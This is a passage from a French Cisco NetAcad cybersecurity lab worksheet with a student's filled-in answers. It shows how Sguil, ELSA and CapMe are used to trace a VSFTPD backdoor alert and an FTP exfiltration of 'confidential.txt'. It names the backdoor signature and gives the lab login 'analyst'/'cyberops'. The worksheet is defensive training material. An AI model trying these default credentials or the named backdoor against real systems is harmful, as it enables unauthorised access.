Étape 4 : Retournez dans Squil pour effectuer des recherches plus poussées sur
l'attaque.
a. Accédez à Sguil et cliquez sur l'onglet RealTime Events. Localiser les événements ET EXLOIT VSFTPD
Backdoor User Login Smiley. Il est possible que ces événements soient des exploits possibles et ils se
sont produits lors de l'accès root non autorisé. L'ID d'alerte 5.2567 est utilisé dans cet exemple.

b. Faites un clic droit sur l'en-tête CNT et sélectionnez View Correlated Events pour afficher tous les
événements associés. Sélectionnez l'ID alerte qui commence par 5. Cette alerte a recueilli les
informations du capteur sur l'interface seconion-eth1-1.
c. Dans le nouvel onglet contenant tous les événements corrélés, faites un clic droit sur l'ID d'alerte et
sélectionnez Transcript pour afficher chaque alerte plus en détail. L'ID d'alerte 5.2569 est utilisé dans cet
exemple. La dernière alerte est susceptible d'afficher la transmission TCP entre le hacker et la victime.

d. Vous pouvez également cliquez sur l'ID d'alerte et sélectionner Wireshark pour examiner et enregistrer le
fichier pcap et le flux TCP.

Étape 5 : Utilisez ELSA pour afficher les données exfiltrées.


a. Pour utiliser ELSA afin d'obtenir plus d'informations sur l'alerte ci-dessus, cliquez sur l'adresse IP source
ou de destination, puis sélectionnez ELSA IP Lookup > DstIP.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 17 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

b. Cliquez sur bro_ftp pour afficher les journaux ELSA qui sont associés à FTP.

c. Quel fichier a été transféré par FTP à 209.165.200.235 ? Quel compte a été utilisé pour transférer le
fichier ?
le fichier qui a été transferé est : confidential.txt et le compte qui a été utilisé est : analyst
____________________________________________________________________________________
d. Cliquez sur info pour afficher les transactions dans le dernier enregistrement. Le champ reply_msg
indique qu'il s'agit de la dernière entrée pour le transfert du fichier confidential.txt. Cliquez sur Plugin >
getPcap. À l'invite, saisissez le nom d'utilisateur analyst et le mot de passe cyberops. Cliquez sur
Submit si nécessaire. CapMe est une interface web qui vous permet d'obtenir une transcription de pcap
et de télécharger ce fichier.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 18 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

La transcription de pcap est restituée à l'aide de tcpflow, et cette page fournit également le lien pour
accéder au fichier pcap.

e. Pour déterminer le contenu du fichier qui a été compromis, ouvrez ELSA en double-cliquant sur l'icône
située sur le Bureau afin d'ouvrir un nouvel onglet et d'effectuer une nouvelle recherche.
f. Développez FTP et cliquez sur FTP Data. Cliquez sur l'un des liens Info et sélectionnez getPcap dans le
menu déroulant afin de déterminer le contenu du fichier volé.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 19 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

g. Le résultat affiche le contenu du fichier confidential.txt qui a été transféré sur le serveur FTP.

Étape 6 : Nettoyage
Arrêtez toutes les machines virtuelles lorsque vous avez terminé.

Remarques générales
Au cours de ces travaux pratiques, vous avez utilisé une vulnérabilité pour accéder à des informations non
autorisées et vous avez passé en revue les journaux comme un analyste en cybersécurité. Vous allez
maintenant présenter vos conclusions.
_______________________________________________________________________________________
Pour qu'une intrusion sur un réseau soit detecté et analysé, il faudrai qu'il y est la mise en place d'un centre
des operation de securité à travers des outils de detection d'intrusion (SIEM) aisin que du personnel qualifié
_______________________________________________________________________________________
sur le domaine de la cybersecurity
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 20 sur 20 www.netacad.com

Vous aimerez peut-être aussi